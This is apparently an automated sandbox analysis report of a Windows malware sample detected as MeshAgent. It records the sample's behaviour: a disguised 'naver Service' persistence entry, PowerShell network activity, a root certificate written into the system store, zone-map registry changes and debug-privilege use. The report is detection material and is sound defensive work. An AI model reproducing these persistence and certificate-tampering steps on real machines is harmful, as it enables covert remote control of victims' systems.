Analysis Overview
SHA256
b01fbd9f1842d5d983b203735b87bc646e3a332d6d975f6e4d05e11a346691bf
Threat Level: Known bad
The file 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch was found to be: Known bad.
Malicious Activity Summary
MeshAgent
Detects MeshAgent payload
Sets service image path in registry
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Checks installed software on the system
Drops file in System32 directory
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-24 03:29
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-24 03:29
Reported
2024-09-24 03:32
Platform
win7-20240903-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-24 03:29
Reported
2024-09-24 03:32
Platform
win10v2004-20240802-en
Max time kernel
124s
Max time network
138s
Command Line
Signatures
Detects MeshAgent payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MeshAgent
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\naver Service\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\naver\\naver.exe\" --meshServiceName=\"naver Service\"" | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
Checks installed software on the system
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\rpcrt4.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\shell32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\shcore.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\exe\MeshService64.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\ntdll.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\comctl32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\Kernel.Appcore.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\ole32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\dbghelp.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\gdiplus.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\ncrypt.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\kernelbase.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\crypt32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\crypt32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\msvcp_win.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\Kernel.Appcore.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\msvcrt.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\combase.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\DLL\dbgcore.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\ws2_32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\rpcrt4.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\win32u.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\gdi32full.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\dbghelp.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\gdiplus.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\DLL\bcrypt.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\kernel32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\rpcrt4.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\ucrtbase.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\advapi32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\ncrypt.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\ntasn1.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\bcryptprimitives.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\DLL\kernel32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\kernelbase.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\ucrtbase.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\win32u.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\DLL\iphlpapi.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\kernelbase.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\win32u.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\gdi32full.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\dbghelp.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\ntasn1.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\ntasn1.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\user32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\user32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\sechost.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\comctl32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\exe\MeshService64.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\iphlpapi.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\DLL\iphlpapi.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\DLL\dbgcore.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ACF87FF98E1EEF3E8BDBF7A9EB64B06CF2BDE3D5 | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\MeshService64.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\advapi32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\symbols\dll\msvcrt.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\shcore.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\shell32.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\F33F806F032136DC54AFC3EA1B57FBCB325C22E0 | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\0BAF0E556ED1305266A37277DFD1935DBD98B214 | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| File opened for modification | C:\Windows\System32\dll\ucrtbase.pdb | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133716222161613689" | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\naver\naver.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
